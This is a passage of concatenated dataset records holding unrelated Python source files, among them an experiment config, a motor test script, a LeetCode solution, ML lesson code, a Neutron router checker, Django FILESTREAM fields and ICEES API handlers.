logging\n# KlibsTesting Param overrides\n#\n# Any param that is commented out by default is either deprecated or else not yet implemented--don't uncomment or use\n#\n#########################################\n# Logging Defaults\n#########################################\nlog_to_file = True\nlevel = logging.INFO\n\n#########################################\n# Display Settings\n#########################################\nadditional_displays = []\nscreen_origin = (0,0) # always (0,0) unless multiple displays in 
use\n#\n#########################################\n# Available Hardware\n#########################################\neye_tracker_available = False\neye_tracking = False\nlabjack_available = False\nlabjacking = False\n#\n#########################################\n# Environment Aesthetic Defaults\n#########################################\ndefault_fill_color = (45, 45, 45, 255)\ndefault_color = (255, 255, 255, 255)\ndefault_response_color = default_color\ndefault_input_color = default_color\ndefault_font_size = 28\ndefault_font_name = 'Frutiger'\ndefault_timeout_message = \"Too slow!\"\n#\n#########################################\n# EyeLink Sensitivities\n#########################################\nview_distance = 104 # in centimeters, 57m = in 1deg of visual angle per horizontal cm of screen\nsaccadic_velocity_threshold = 20\nsaccadic_acceleration_threshold = 5000\nsaccadic_motion_threshold = 0.15\n#\nfixation_size = 1, # deg of visual angle\nbox_size = 1, # deg of visual angle\ncue_size = 1, # deg of visual angle\ncue_back_size = 1, # deg of visual angle\n#\n#########################################\n# Experiment Structure\n#########################################\nmulti_session_project = False\ncollect_demographics = False\nmanual_demographics_collection = False\npracticing = False\ntrials_per_block = 24\nblocks_per_experiment = 1\ntrials_per_participant = 0\ntable_defaults = {}\n#\n#########################################\n# Development Mode Settings\n#########################################\ndm_suppress_debug_pane = False\ndm_auto_threshold = True\ndm_trial_show_mouse = True\ndm_ignore_local_overrides = False\n\n#\n#########################################\n# Data Export Settings\n#########################################\ndata_columns = None\ndefault_participant_fields = [[\"userhash\", \"participant\"], \"sex\", \"age\", \"handedness\"]\ndefault_participant_fields_sf = [[\"userhash\", \"participant\"], \"random_seed\", \"sex\", \"age\", \"handedness\"]\n\n#\n#########################################\n# Demographics Questions\n#########################################\n# Note: This list must supply all columns in the configured Participants table except:\n# \t- id\n# \t- participant id\n# \t- random_seed\n#\t- klibs_commit (if present)\n#\t- created\n# These columns must be present in the participants table (except klibs_commit) and are supplied automatically by klibs\ndemographic_questions = [\n\t['sex', \"What is your sex? \\nAnswer with: (m)ale,(f)emale\", ('m', 'M', 'f', 'F'), 'str', random.choice(['m', 'f'])],\n\t['handedness', \"Are right-handed, left-handed or ambidextrous? 
\\nAnswer with (r)ight, (l)eft or (a)mbidextrous.\",\n\t ('r', 'R', 'l', 'L', 'a', 'A'), 'str', 'r'],\n\t['age', 'What is your age?', None, 'int', -1]\n]\n\n#\n#########################################\n# PROJECT-SPECIFIC VARS\n#########################################\n","sub_path":"lib/klibs/template/params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"520233557","text":"import sys\nimport time\nimport numpy as np\nfrom canmotorlib import CanMotorController\n\n\ndef setZeroPosition(motor, initPos):\n\n pos = initPos\n\n while abs(np.rad2deg(pos)) > 0.5:\n pos, vel, curr = motor.set_zero_position()\n print(\"Position: {}, Velocity: {}, Torque: {}\".format(np.rad2deg(pos), np.rad2deg(vel),\n curr))\n\n\n# Motor ID\nmotor_id_shoulder = 0x01\nmotor_id_elbow = 0x03\n\nif len(sys.argv) != 2:\n print('Provide CAN device name (can0, slcan0 etc.)')\n sys.exit(0)\n\nprint(\"Using Socket {} for can communucation\".format(sys.argv[1],))\n\nmotor_shoulder = CanMotorController(sys.argv[1], motor_id_shoulder)\nmotor_elbow = CanMotorController(sys.argv[1], motor_id_elbow)\n\nprint(\"Enabling Motors..\")\n\npos_shoulder, vel_shoulder, curr_shoulder = motor_shoulder.enable_motor()\n\nprint(\"Shoulder Motor Status: Pos: {}, Vel: {}, Torque: {}\".format(pos_shoulder, vel_shoulder,\n curr_shoulder))\n\npos_elbow, vel_elbow, curr_elbow = motor_elbow.enable_motor()\n\nprint(\"Elbow Motor Status: Pos: {}, Vel: {}, Torque: {}\".format(pos_elbow, vel_elbow, curr_elbow))\n\nprint(\"Setting Shoulder Motor to Zero Position...\")\n\nsetZeroPosition(motor_shoulder, pos_shoulder)\n\nprint(\"Setting Elbow Motor to Zero Position...\")\n\nsetZeroPosition(motor_elbow, pos_elbow)\n\n\n# # Rotation Test. 
Uncomment to rotate the motors for almost 4 revolutions.\n# angularVelDeg = 720\n# sleepTime = 2\n\n# pos_shoulder, vel_shoulder, curr_shoulder = motor_shoulder.send_deg_command(0, angularVelDeg, 0, 5, 0)\n# pos_elbow, vel_elbow, curr_elbow = motor_elbow.send_deg_command(0, angularVelDeg / 2, 0, 5, 0)\n\n# time.sleep(sleepTime)\n\n# pos_shoulder, vel_shoulder, curr_shoulder = motor_shoulder.send_deg_command(0, 0, 0, 5, 0)\n# pos_elbow, vel_elbow, curr_elbow = motor_elbow.send_deg_command(0, 0, 0, 5, 0)\n\n# time.sleep(0.5)\n\n\nprint(\"Disabling Motors...\")\n\npos_shoulder, vel_shoulder, curr_shoulder = motor_shoulder.disable_motor()\n\nprint(\"Shoulder Motor Status: Pos: {}, Vel: {}, Torque: {}\".format(pos_shoulder, vel_shoulder,\n                                                                  curr_shoulder))\n\npos_elbow, vel_elbow, curr_elbow = motor_elbow.disable_motor()\n\nprint(\"Elbow Motor Status: Pos: {}, Vel: {}, Torque: {}\".format(pos_elbow, vel_elbow, curr_elbow))\n","sub_path":"two_motor_test.py","file_name":"two_motor_test.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"165604087","text":"# https://www.jiuzhang.com/solutions/validate-binary-search-tree\n\n# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\nclass Solution:\n    def isValidBST(self, root: TreeNode) -> bool:\n\n        # output = []\n        # return self.dfs_v1(root, output)\n\n        self.last_val = None\n        self.is_bst = True\n        self.dfs_v2(root)\n        return self.is_bst\n\n    def dfs_v2(self, root):\n        # Same as v1 but use instance variables instead of an output list\n        # O(N), O(1)\n        if not root:\n            return\n\n        self.dfs_v2(root.left)\n\n        if self.last_val is not None and self.last_val >= root.val:\n            self.is_bst = False\n            return\n        self.last_val = root.val\n\n        self.dfs_v2(root.right)\n\n    def dfs_v1(self, root, output):\n        # Use inorder traversal, record the numbers, and make sure the last number is smaller than the current one\n        # O(N), O(N)\n        if not root:\n            return True\n\n        left = self.dfs_v1(root.left, output)\n\n        if output and output[-1] >= root.val:\n            return False\n        output.append(root.val)\n\n        right = self.dfs_v1(root.right, output)\n\n        return left and right\n","sub_path":"leetcode/lc98_Validate_Binary_Search_Tree.py","file_name":"lc98_Validate_Binary_Search_Tree.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"578965363","text":"cat = '\\tI am tabbed in'\npersian_cat = 'I\\'m split \\non a line.'\nbackslash = 'I am \\\\a cat and not \\\\ a dog'\nfat_cat = '''\ni am on new line,\n\\thow are you doing.\n\\tIt feels good.\n'''\nprint(cat)\nprint(persian_cat)\nprint(backslash)\nprint(fat_cat)\n\n# while True:\n#     for i in [\"/\", \"-\", \"|\", \"\\\\\", \"|\"]:\n#         print(\"%s\\r\" % i)\n","sub_path":"ShaW/Part_1/ex10.py","file_name":"ex10.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"193707234","text":"# -*- coding: utf-8 -*-\n\nimport tensorflow as tf\nfrom matplotlib import pyplot as plt\n\n\n\nfrom sklearn.datasets import load_digits\nfrom matplotlib import pyplot as plt\n\ndigits = load_digits()\nprint(digits.data.shape)\n\nfig = plt.figure(figsize=(3, 3))\n#figsize w,h tuple in inches\n\nplt.imshow(digits['images'][66], cmap=\"gray\", interpolation='none')\n\n#plt.show()\nplt.savefig(\"lesson9-digits.png\")\n\n#=================\nfrom sklearn import svm\nclassifier = 
svm.SVC(gamma=0.001)\n#classifier.fit(digits.data, digits.target)\n#predicted = classifier.predict(digits.data)\n\nimport numpy as np\n# print(np.mean(digits.target == predicted))\n\nfrom sklearn.cross_validation import train_test_split\nX=digits.data\ny=digits.target\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)\n\nprint(\"X_train: \" , X_train.shape)\nprint(\"y_train: \", y_train.shape)\nprint(\"X_test: \", X_test.shape)\nprint(\"y_test: \", y_test.shape)\n\nclassifier.fit(X_train, y_train)\npredicted = classifier.predict(X_test)\nprint(np.mean(y_test == predicted))\n\n\n#=========== \nfrom tensorflow.contrib import skflow\nn_classes = len(set(y_train))\nprint(n_classes)\n# classifier = skflow.TensorFlowLinearClassifier(n_classes=n_classes)\n# xxx classifier = skflow.TensorFlowDNNClassifier(n_classes=n_classes)\n # Build 3 layer DNN with 10, 20, 10 units respectively.\nclassifier = skflow.DNNClassifier(hidden_units=[20, 20, 10], n_classes=n_classes)\n# optimizer=tf.train.ProximalAdagradOptimizer(\n# learning_rate=0.1,\n# l1_regularization_strength=0.001\n# ))\nclassifier.fit(X_train, y_train,steps=1000) \n\ny_pred = classifier.predict(X_test)\n\nfrom sklearn import metrics\nprint(metrics.classification_report(y_true=y_test, y_pred=y_pred))\nprint(np.mean(y_test == y_pred))","sub_path":"lesson9.py","file_name":"lesson9.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"443358004","text":"# Copyright (c) 2016 Eayun, Inc.\n# All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\"\"\"\nModule to check L3 networking configurations.\n\"\"\"\n\nfrom netmon import checker\nfrom netmon.lib.neutron import NEUTRON_CLIENT\nfrom netmon.logger.logger import LOG\nfrom netmon.plugins.base_plugin import BasePlugin\n\n\nclass L3Router(BasePlugin):\n \"\"\"Module to check L3 networking configurations.\"\"\"\n\n def __init__(self):\n self.routers = {}\n\n def _router_collector(self):\n l3_agent = NEUTRON_CLIENT.get_l3_agent_on_host()\n if l3_agent:\n l3_agent_id = l3_agent['id']\n else:\n return\n\n self.routers = {\n router['id']: router\n for router\n in NEUTRON_CLIENT.list_routers_on_l3_agent(l3_agent_id)['routers']\n }\n\n def _router_port_collector(self):\n for router_id in self.routers:\n self.routers[router_id]['ports'] = [\n {'id': port['id'],\n 'ip_address': port['fixed_ips'][0]['ip_address'],\n 'subnet_id': port['fixed_ips'][0]['subnet_id']}\n for port in NEUTRON_CLIENT.list_router_interfaces(router_id)\n ]\n\n def _floatingip_collector(self):\n for router_id in self.routers:\n self.routers[router_id]['floatingips'] = {\n fip['id']: fip['floating_ip_address']\n for fip\n in NEUTRON_CLIENT.list_floatingip_by_router(router_id)\n }\n\n def collector(self):\n \"\"\"Data collector\"\"\"\n self._router_collector()\n self._router_port_collector()\n self._floatingip_collector()\n\n def checker(self):\n \"\"\"Checker\"\"\"\n for router, router_setting in self.routers.items():\n LOG.info(\"Checking L3 router %s...\", router,\n extra_empty_line=True)\n router_ns = 'qrouter-' + router\n if router_setting['status'] != 'ACTIVE':\n LOG.danger(\"Router %s is not in active status!\", router)\n continue\n gw_port_id = router_setting.get('gw_port_id')\n if gw_port_id:\n LOG.info(\"Checking gateway port %s of router %s...\",\n gw_port_id, router)\n gw_port = ('qg-' + gw_port_id)[:14]\n checker.check_ovs_port_in_bridge('br-ex', gw_port)\n\n gateway_info = router_setting.get('external_gateway_info')\n external_ips = gateway_info.get('external_fixed_ips', [])\n if not external_ips:\n LOG.danger(\"Router %s has a gateway port without any \"\n \"external IP!\", router)\n else:\n checker.check_router_connection(router, router_ns)\n for fixed_ip in external_ips:\n cidr_addr = NEUTRON_CLIENT.get_cidr_addr(\n fixed_ip['subnet_id'], fixed_ip['ip_address'])\n checker.check_device_ips(gw_port, [cidr_addr],\n namespace=router_ns)\n\n floatingips = router_setting.get('floatingips', {})\n if floatingips:\n LOG.info(\"Checking floating IPs on router %s...\", router)\n for ip_addr in floatingips.values():\n ip_addr += '/32' # Floating IPs\n checker.check_device_ips(gw_port, [ip_addr],\n namespace=router_ns)\n else:\n LOG.caution(\"L3 router %s doesn't have a gateway port!\",\n router)\n\n ports = router_setting.get('ports', [])\n if ports:\n LOG.info(\"Checking router ports on router %s...\", router)\n for port in ports:\n LOG.info(\"Checking router port %s of subnet %s on \"\n \"router %s...\",\n port['id'], port['subnet_id'], router)\n port_device = ('qr-' + port['id'])[:14]\n checker.check_ovs_port_in_bridge('br-int', port_device)\n checker.check_ovs_port_tag('br-int', port_device, 0,\n check_port_dead=True)\n cidr_addr = NEUTRON_CLIENT.get_cidr_addr(\n port['subnet_id'], port['ip_address'])\n checker.check_device_ips(port_device, [cidr_addr],\n 
namespace=router_ns)\n","sub_path":"netmon/plugins/l3_router.py","file_name":"l3_router.py","file_ext":"py","file_size_in_byte":5112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"112302363","text":"def total_transfer_time (linkLength_km, speedOfLight_kms, processingDelay_s, dataRate_bps, maxUserDataBitsPerPacket_b, overheadBitsPerPacket_b, messageLength_b):\n    l = linkLength_km\n    c = speedOfLight_kms\n    p = processingDelay_s\n    r = dataRate_bps\n    s = maxUserDataBitsPerPacket_b\n    o = overheadBitsPerPacket_b\n    m = messageLength_b\n    \n    transmission_delay = (s + o) / r\n    propagation_delay = l / c\n    total_time = ((propagation_delay + transmission_delay + p) * 2) + (transmission_delay) * ((m / s) - 1) \n    return total_time\n\nprint (\"{:.4f}\".format(total_transfer_time(20000, 200000, 0.001, 1000000, 1000, 100, 5000)))\nprint (total_transfer_time (10000, 200000, 0.001, 1000000, 1000, 100, 1000000000))","sub_path":"lab/total_transfer_time.py","file_name":"total_transfer_time.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"361554892","text":"#! /usr/bin/env python\n#coding=utf-8\n\nimport urllib\nimport urllib2\nimport sys\nimport time\nimport re\nimport socket\nimport json\nfrom bs4 import BeautifulSoup\n\n\nsocket.setdefaulttimeout(60)\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nclass getFollowers:\n    charset = 'utf8'\n    uid = '';\n    path='C:/weibodata'\n    pageNum = 0 # how many pages of followed users there are in total\n    \n    def get_followers(self,uid):\n        followerlist=[]\n        self.uid = uid\n        url = self.get_url(uid)\n        req = urllib2.Request(url)\n        result = urllib2.urlopen(req)\n        text = result.read()\n        content = eval(\"u\\\"\\\"\\\" \"+text+\"\\n \\\"\\\"\\\" \").encode(getFollowers.charset)\n        self.get_totallPageNum(content)\n        i=1\n        while iSTK && STK.pageletM && STK.pageletM.view\\((.*?)\\)<\\/script>')\n        result = pattern.findall(text)\n        jsonResult = json.loads(result[8]) # the result entry that holds the followed users' info\n        soup = BeautifulSoup(jsonResult['html'])\n        try:\n            idlist=soup.findAll('a',attrs={'class': \"W_f14 S_func1\"})\n            for ids in idlist:\n                id=ids['usercard']\n                followerlist.append(id)\n        except Exception as e:\n            pass\n        for follower in followerlist:\n            self.writefile(self.path+'/'+self.uid+'_follow.txt',follower[3:]+'\\n') \n    \n    \n    def get_totallPageNum(self,content):\n        tag1 = '<strong>'\n        pos1 = content.find(tag1)+len(tag1)\n        tag2 = '<\\/strong>'\n        pos2 = content.find(tag2,pos1)\n        getFollowers.pageNum = int(float(content[pos1:pos2]))\n        getFollowers.pageNum = getFollowers.pageNum/20+1\n    \n    def get_url(self,uid,page=1):\n        url = 'http://weibo.com/' + uid + '/follow?page='+str(page)\n        return url\n    def writefile(self,filename,content):\n        fw = file(filename,'a')\n        fw.write(content)\n        fw.close()\n    \n    \n","sub_path":"不使用API/pythonspider 单进程完整版/getFollowers.py","file_name":"getFollowers.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"86783087","text":"#ol4.py takes a list of offline computers from a computer lab and compares them with a list of supported computers, returning the list of offline supported computers only.\n\nimport csv\n\noffline = csv.reader(open('/Users/*YOURNAME*/Desktop/Offline Monday/offline.csv', 'rU'))\nhostnames = csv.reader(open('/Users/*YOURNAME*/Desktop/Offline Monday/supported_host_names.csv', 'rU'))\n\nofflineOne = []\nofflineTwo = []\n\n\ndef get_intersection(offline, hostnames):\n    for row in 
offline:\n offlineOne.append(row[1])\n for row in hostnames:\n offlineTwo.append(row[1])\n out_str = ''\n for e in set(offlineOne).intersection(set(offlineTwo)):\n out_str += str(e) + '\\n'\n return out_str\n\nfinal = get_intersection(offline, hostnames)\n\noutfile = open('offline_out.txt', 'w')\noutfile.write(final)\noutfile.close()\n","sub_path":"ol4.py","file_name":"ol4.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"563389353","text":"import six\nimport uuid\n\nfrom django.core import checks\nfrom django.core.files.base import ContentFile, File\nfrom django.db import models\nfrom django.utils.six import with_metaclass\n\nfrom sql_filestream.win32_streaming_api import StreamingAPIFileDescriptor\n\n\nclass FileStreamDataField(with_metaclass(models.SubfieldBase, models.BinaryField)):\n\n description = 'Field that maps to a SQL Server FILESTREAM column'\n unallowed_parameters = ['primary_key', 'upload_to', 'storage']\n\n def __init__(self, **kwargs):\n self.identifier_column = kwargs.get('identifier_column', 'doc_id')\n for arg in self.unallowed_parameters:\n setattr(self, '_%s_in_kwargs' % arg, arg in kwargs)\n super(FileStreamDataField, self).__init__(**kwargs)\n\n def check(self, **kwargs):\n errors = super(FileStreamDataField, self).check(**kwargs)\n errors.extend(self._check_unallowed_parameters())\n return errors\n\n def _check_unallowed_parameters(self):\n errors = []\n for arg in self.unallowed_parameters:\n if getattr(self, '_%s_in_kwargs' % arg):\n errors.append(\n checks.Error(\n \"'%s' is not a valid argument for a %s.\" %\n (arg, self.__class__.__name__),\n obj=self\n )\n )\n return errors\n\n def _get_identifier_column(self):\n return self.identifier_column\n\n def db_type(self, connection):\n if connection.settings_dict['ENGINE'] == 'sqlserver_ado':\n return ('varbinary(max) FILESTREAM UNIQUE NONCLUSTERED ([%s] ASC)' %\n self.identifier_column)\n raise NotImplementedError('FileStreamField can only be used with '\n 'sqlserver_ado database engine')\n\n def get_db_prep_value(self, value, connection, prepared=False):\n if isinstance(value, ContentFile):\n value = buffer(value.read())\n return super(FileStreamDataField, self).get_db_prep_value(value, connection,\n prepared)\n\n def to_python(self, value):\n if isinstance(value, ContentFile):\n return value\n return ContentFile(super(FileStreamDataField, self).to_python(value))\n\n\nclass FileStreamField(object):\n\n description = 'Virtual field to interact with the Win32 Streaming API'\n\n def __init__(self, uuid_field='file_id', fs_field='file_content'):\n self.uuid_field = uuid_field\n self.fs_field = fs_field\n self.editable = False\n self.rel = None\n self.column = None\n self._fd = None\n\n def contribute_to_class(self, cls, name):\n self.name = name\n self.model = cls\n cls._meta.add_virtual_field(self)\n setattr(cls, name, self)\n self.descriptor = None\n\n def __get__(self, instance, cls=None):\n if instance is None:\n return self\n if not instance.pk:\n return None\n if not self._fd:\n self._fd = StreamingAPIFileDescriptor(self, instance)\n return self._fd\n\n def __set__(self, instance, content):\n if not (isinstance(content, File) and content.closed == False):\n raise TypeError(\"'%s' must be an opened File instance.\"\n % self.name)\n if not instance.pk:\n # This means that the instance has not been saved to the database yet\n # In this case we cannot use the Win32 Streaming API to save the file\n raise 
IOError(\"Cannot write file via Streaming API for this instance, as \"\n \"it has not been saved to the database yet.\")\n if not self._fd:\n self._fd = self.__get__(instance)\n with self._fd.open('wb') as f:\n for chunk in content:\n f.write(chunk)\n\n\n# UUIDField has been added since Django 1.8 but is not supported yet by django-mssql\n# So we create it here. The field maps to a SQL Server UNIQUEIDENTIFIER column\n# Adapted from https://github.com/django/django/blob/master/django/db/models/fields/__init__.py#L2351\nclass UUIDField(with_metaclass(models.SubfieldBase, models.Field)):\n default_error_messages = {\n 'invalid': \"'%(value)s' is not a valid UUID.\",\n }\n description = 'Universally unique identifier'\n empty_strings_allowed = False\n\n def __init__(self, verbose_name=None, **kwargs):\n kwargs['max_length'] = 32\n super(UUIDField, self).__init__(verbose_name, **kwargs)\n\n def deconstruct(self):\n name, path, args, kwargs = super(UUIDField, self).deconstruct()\n del kwargs['max_length']\n return name, path, args, kwargs\n\n def get_internal_type(self):\n return \"UUIDField\"\n\n def db_type(self, connection):\n return 'uniqueidentifier ROWGUIDCOL'\n\n def get_placeholder(self, value, connection):\n return 'CAST (%s as UNIQUEIDENTIFIER)'\n\n def get_db_prep_value(self, value, connection, prepared=False):\n if isinstance(value, uuid.UUID):\n return str(value)\n return value\n\n def to_python(self, value):\n if value and not isinstance(value, uuid.UUID):\n try:\n return uuid.UUID(value)\n except ValueError:\n raise exceptions.ValidationError(\n self.error_messages['invalid'],\n code='invalid',\n params={'value': value},\n )\n return value\n","sub_path":"sql_filestream/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":4942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"324740614","text":"\"\"\"ICEES API handlers.\"\"\"\nfrom collections import defaultdict\nimport copy\nimport os\nimport json\nfrom typing import Dict, Union, Optional\n\nfrom fastapi import APIRouter, Body, Depends, Security, HTTPException\nfrom fastapi.security.api_key import APIKeyQuery, APIKeyCookie, APIKeyHeader, APIKey\nfrom reasoner_pydantic import Query, Message\nfrom sqlalchemy.sql.expression import table\nfrom starlette.status import HTTP_403_FORBIDDEN\n\nfrom .dependencies import get_db\nfrom .features import knowledgegraph, sql\nfrom .features.identifiers import get_identifiers, input_dict\nfrom .features.qgraph_utils import normalize_qgraph\nfrom .features.sql import validate_range, validate_feature_value_in_table_column_for_equal_operator\nfrom .features.mappings import mappings, correlations\nfrom .features.config import get_config_path\nfrom .models import (\n Features,\n FeatureAssociation, FeatureAssociation2,\n AllFeaturesAssociation, AllFeaturesAssociation2,\n AddNameById,\n)\nfrom .utils import to_qualifiers, to_qualifiers2, associations_have_feature_matrices\n\n\nAPI_KEY = os.environ.get(\"API_KEY\")\nAPI_KEY_NAME = os.environ.get(\"API_KEY_NAME\")\nCOOKIE_DOMAIN = os.environ.get(\"COOKIE_DOMAIN\")\nTABLES = (\"patient\", \"visit\")\n\n\ndef validate_table(table_name):\n \"\"\"Validate table name.\"\"\"\n if table_name not in TABLES:\n raise HTTPException(400, f\"Invalid table '{table_name}'\")\n\n\nif API_KEY is None:\n async def get_api_key():\n return None\nelse:\n api_key_query = APIKeyQuery(name=API_KEY_NAME, auto_error=False)\n api_key_header = APIKeyHeader(name=API_KEY_NAME, auto_error=False)\n api_key_cookie = 
APIKeyCookie(name=API_KEY_NAME, auto_error=False)\n\n async def get_api_key(\n api_key_query: str = Security(api_key_query),\n api_key_header: str = Security(api_key_header),\n api_key_cookie: str = Security(api_key_cookie),\n ):\n\n if api_key_query == API_KEY:\n return api_key_query\n elif api_key_header == API_KEY:\n return api_key_header\n elif api_key_cookie == API_KEY:\n return api_key_cookie\n else:\n raise HTTPException(\n status_code=HTTP_403_FORBIDDEN, detail=\"Could not validate credentials\"\n )\n\n \nROUTER = APIRouter()\n\n\n@ROUTER.post(\"/{table}/cohort\", response_model=Dict)\ndef discover_cohort(\n table: str,\n req_features: Features = Body(..., example={}),\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Cohort discovery.\"\"\"\n validate_table(table)\n cohort_id, size = sql.get_ids_by_feature(\n conn,\n table,\n None,\n req_features,\n )\n\n if size == -1:\n return_value = (\n \"Input features invalid or cohort ≤10 patients. \"\n \"Please try again.\"\n )\n else:\n return_value = {\n \"cohort_id\": cohort_id,\n \"size\": size\n }\n return {\"return value\": return_value}\n\n\n@ROUTER.get(\n \"/{table}/cohort/dictionary\",\n response_model=Dict,\n)\ndef dictionary(\n table: str,\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Get cohort dictionary.\"\"\"\n validate_table(table)\n return_value = sql.get_cohort_dictionary(conn, table, None)\n return {\"return value\": return_value}\n\n\n@ROUTER.put(\"/{table}/cohort/{cohort_id}\", response_model=Dict)\ndef edit_cohort(\n table: str,\n cohort_id: str,\n req_features: Features = Body(..., example={}),\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Cohort discovery.\"\"\"\n validate_table(table)\n cohort_id, size = sql.select_cohort(\n conn,\n table,\n None,\n req_features,\n cohort_id,\n )\n\n if size == -1:\n return_value = (\n \"Input features invalid or cohort ≤10 patients. \"\n \"Please try again.\"\n )\n else:\n return_value = {\n \"cohort_id\": cohort_id,\n \"size\": size\n }\n return {\"return value\": return_value}\n\n\n@ROUTER.get(\"/{table}/cohort/{cohort_id}\", response_model=Dict)\ndef get_cohort(\n table: str,\n cohort_id: str,\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Get definition of a cohort.\"\"\"\n validate_table(table)\n cohort_features = sql.get_cohort_by_id(\n conn,\n table,\n None,\n cohort_id,\n )\n\n if cohort_features is None:\n return_value = \"Input cohort_id invalid. 
Please try again.\"\n else:\n return_value = cohort_features\n return {\"return value\": return_value}\n\n\nwith open(\"examples/feature_association.json\") as stream:\n FEATURE_ASSOCIATION_EXAMPLE = json.load(stream)\n\n\n@ROUTER.post(\n \"/{table}/cohort/{cohort_id}/feature_association\",\n response_model=Dict,\n)\ndef feature_association(\n table: str,\n cohort_id: str,\n year: Optional[str] = None,\n obj: FeatureAssociation = Body(\n ...,\n example=FEATURE_ASSOCIATION_EXAMPLE,\n ),\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Hypothesis-driven 2 x 2 feature associations.\n\n Users select a predefined cohort and two feature variables, and the service\n returns a 2 x 2 feature table with a correspondingChi Square statistic and\n P value.\n \"\"\"\n validate_table(table)\n feature_a = to_qualifiers(obj[\"feature_a\"])\n feature_b = to_qualifiers(obj[\"feature_b\"])\n try:\n validate_feature_value_in_table_column_for_equal_operator(conn, table, feature_a)\n validate_feature_value_in_table_column_for_equal_operator(conn, table, feature_b)\n except RuntimeError as ex:\n return {\"return value\": str(ex)}\n\n cohort_meta = sql.get_features_by_id(conn, table, cohort_id)\n\n if cohort_meta is None:\n return_value = \"Input cohort_id invalid. Please try again.\"\n else:\n cohort_features, cohort_year = cohort_meta\n return_value = sql.select_feature_matrix(\n conn,\n table,\n year,\n cohort_features,\n cohort_year,\n feature_a,\n feature_b,\n )\n if not return_value['feature_matrix']:\n return_value = \"Empty query result returned. Please try again\"\n return {\"return value\": return_value}\n\n\nwith open(\"examples/feature_association2.json\") as stream:\n FEATURE_ASSOCIATION2_EXAMPLE = json.load(stream)\n\n\n@ROUTER.post(\n \"/{table}/cohort/{cohort_id}/feature_association2\",\n response_model=Dict,\n)\ndef feature_association2(\n table: str,\n cohort_id: str,\n year: Optional[str] = None,\n obj: FeatureAssociation2 = Body(\n ...,\n example=FEATURE_ASSOCIATION2_EXAMPLE,\n ),\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Hypothesis-driven N x N feature associations.\n\n Users select a predefined cohort, two feature variables, and bins, which\n can be combined, and the service returns a N x N feature table with a\n corresponding Chi Square statistic and P value.\n \"\"\"\n validate_table(table)\n feature_a = to_qualifiers2(obj[\"feature_a\"])\n feature_b = to_qualifiers2(obj[\"feature_b\"])\n try:\n validate_feature_value_in_table_column_for_equal_operator(conn, table, feature_a)\n validate_feature_value_in_table_column_for_equal_operator(conn, table, feature_b)\n except RuntimeError as ex:\n return {\"return value\": str(ex)}\n\n to_validate_range = obj.get(\"check_coverage_is_full\", False)\n if to_validate_range:\n validate_range(conn, table, feature_a)\n validate_range(conn, table, feature_b)\n\n cohort_meta = sql.get_features_by_id(conn, table, cohort_id)\n\n if cohort_meta is None:\n return_value = \"Input cohort_id invalid. Please try again.\"\n else:\n cohort_features, cohort_year = cohort_meta\n return_value = sql.select_feature_matrix(\n conn,\n table,\n year,\n cohort_features,\n cohort_year,\n feature_a,\n feature_b,\n )\n if not return_value['feature_matrix']:\n return_value = \"Empty query result returned. 
Please try again\"\n\n return {\"return value\": return_value}\n\n\nwith open(\"examples/associations_to_all_features.json\") as stream:\n ASSOCIATIONS_TO_ALL_FEATURES_EXAMPLE = json.load(stream)\n\n\n@ROUTER.post(\n \"/{table}/cohort/{cohort_id}/associations_to_all_features\",\n response_model=Dict,\n)\ndef associations_to_all_features(\n table: str,\n cohort_id: str,\n year: Optional[str] = None,\n obj: AllFeaturesAssociation = Body(\n ...,\n example=ASSOCIATIONS_TO_ALL_FEATURES_EXAMPLE,\n ),\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Exploratory 1 X N feature associations.\n\n Users select a predefined cohort and a feature variable of interest, and\n the service returns a 1 x N feature table with corrected Chi Square\n statistics and associated P values.\n \"\"\"\n validate_table(table)\n feature = to_qualifiers(obj[\"feature\"])\n try:\n validate_feature_value_in_table_column_for_equal_operator(conn, table, feature)\n except RuntimeError as ex:\n return {\"return 